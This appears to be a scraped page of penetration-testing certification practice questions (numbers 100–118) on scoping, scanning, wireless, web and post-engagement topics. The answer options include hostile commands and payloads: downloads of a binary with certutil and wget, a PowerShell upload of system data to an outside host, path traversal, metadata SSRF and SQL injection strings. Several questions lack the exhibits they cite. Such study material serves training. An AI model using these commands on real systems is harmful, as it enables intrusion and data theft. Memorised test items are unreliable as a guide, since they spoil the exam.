A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.

Which of the following actions, if performed, would be ethical within the scope of the assessment?

A.

Exploiting a configuration weakness in the SQL database

B.

Intercepting outbound TLS traffic

C.

Gaining access to hosts by injecting malware into the enterprise-wide update server

D.

Leveraging a vulnerability on the internal CA to issue fraudulent client certificates

E.

Establishing and maintaining persistence on the domain controller

Full Access
Question # 100

The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

A.

This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.

B.

This device is most likely a gateway with in-band management services.

C.

This device is most likely a proxy server forwarding requests over TCP/443.

D.

This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.

Full Access
Question # 101

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?

A.

Send deauthentication frames to the stations.

B.

Perform jamming on all 2.4GHz and 5GHz channels.

C.

Set the malicious AP to broadcast within dynamic frequency selection channels.

D.

Modify the malicious AP configuration to not use a pre-shared key.

Full Access
Question # 102

A consultant is reviewing the following output after reports of intermittent connectivity issues:

? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]

? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]

? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]

? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]

? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]

? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]

? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]

? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet]

Which of the following is MOST likely to be reported by the consultant?

A.

A device on the network has an IP address in the wrong subnet.

B.

A multicast session was initiated using the wrong multicast group.

C.

An ARP flooding attack is using the broadcast address to perform DDoS.

D.

A device on the network has poisoned the ARP cache.

Full Access
Question # 103

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

A.

Follow the established data retention and destruction process

B.

Report any findings to regulatory oversight groups

C.

Publish the findings after the client reviews the report

D.

Encrypt and store any client information for future analysis

Full Access
Question # 104

A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester. Which of the following would be the most appropriate NEXT step?

A.

Terminate the contract.

B.

Update the ROE with new signatures. Most Voted

C.

Scan the 8-bit block to map additional missed hosts.

D.

Continue the assessment.

Full Access
Question # 105

A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile , a blank page was displayed.

Which of the following is the MOST likely reason for the lack of output?

A.

The HTTP port is not open on the firewall.

B.

The tester did not run sudo before the command.

C.

The web server is using HTTPS instead of HTTP.

D.

This URI returned a server error.

Full Access
Question # 106

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

A.

Run nmap with the –o, -p22, and –sC options set against the target

B.

Run nmap with the –sV and –p22 options set against the target

C.

Run nmap with the --script vulners option set against the target

D.

Run nmap with the –sA option set against the target

Full Access
Question # 107

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

A.

certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe

B.

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

C.

schtasks /query /fo LIST /v | find /I “Next Run Time:”

D.

wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

Full Access
Question # 108

A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?

A.

Delete the scheduled batch job.

B.

Close the reverse shell connection.

C.

Downgrade the svsaccount permissions.

D.

Remove the tester-created credentials.

Full Access
Question # 109

A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

A.

Manually check the version number of the VoIP service against the CVE release

B.

Test with proof-of-concept code from an exploit database

C.

Review SIP traffic from an on-path position to look for indicators of compromise

D.

Utilize an nmap –sV scan against the service

Full Access
Question # 110

A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company’s request?

A.

The reverse-engineering team may have a history of selling exploits to third parties.

B.

The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.

C.

The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.

D.

The reverse-engineering team will be given access to source code for analysis.

Full Access
Question # 111

A penetration tester is reviewing the security of a web application running in an laaS compute instance. Which of the following payloads should the tester send to get the running process credentials?

A.

file=http://192.168. 1. 78?+document.cookie

B.

file =.. / .. / .. /proc/self/environ

C.

file='%20or%2054365=54365 ;--

D.

file=http://169.254.169.254/latest/meta-data/

Full Access
Question # 112

A potential reason for communicating with the client point of contact during a penetration test is to provide resolution if a testing component crashes a system or service and leaves them unavailable for both legitimate users and further testing. Which of the following best describes this concept?

A.

Retesting

B.

De-escalation

C.

Remediation

D.

Collision detection

Full Access
Question # 113

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Full Access
Question # 114

Given the following Nmap scan command:

[root@kali ~]# nmap 192.168.0 .* -- exclude 192.168.0.101

Which of the following is the total number of servers that Nmap will attempt to scan?

A.

1

B.

101

C.

255

D.

256

Full Access
Question # 115

A penetration tester is reviewing the logs of a proxy server and discovers the following URLs:

https://test.comptia.com/profile.php?userid=1546

https://test.cpmptia.com/profile.php?userid=5482

https://test.comptia.com/profile.php?userid=3618

Which of the following types of vulnerabilities should be remediated?

A.

Insecure direct object reference

B.

Improper error handling

C.

Race condition

D.

Weak or default configurations

Full Access
Question # 116

Which of the following tools would be best to use to conceal data in various kinds of image files?

A.

Kismet

B.

Snow

C.

Responder

D.

Metasploit

Full Access
Question # 117

During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files:

<% String id = request.getParameter("id"); %>

Employee ID: <%= id %>

Which of the following is the best remediation to prevent a vulnerability from being exploited, based on this code?

A.

Parameterized queries

B.

Patch application

C.

Output encoding

Full Access
Question # 118

An organization's Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago. Which of the following post-report delivery activities would have most likely prevented this scenario?

A.

Client acceptance

B.

Data destruction process

C.

Attestation of findings

D.

Lessons learned

Full Access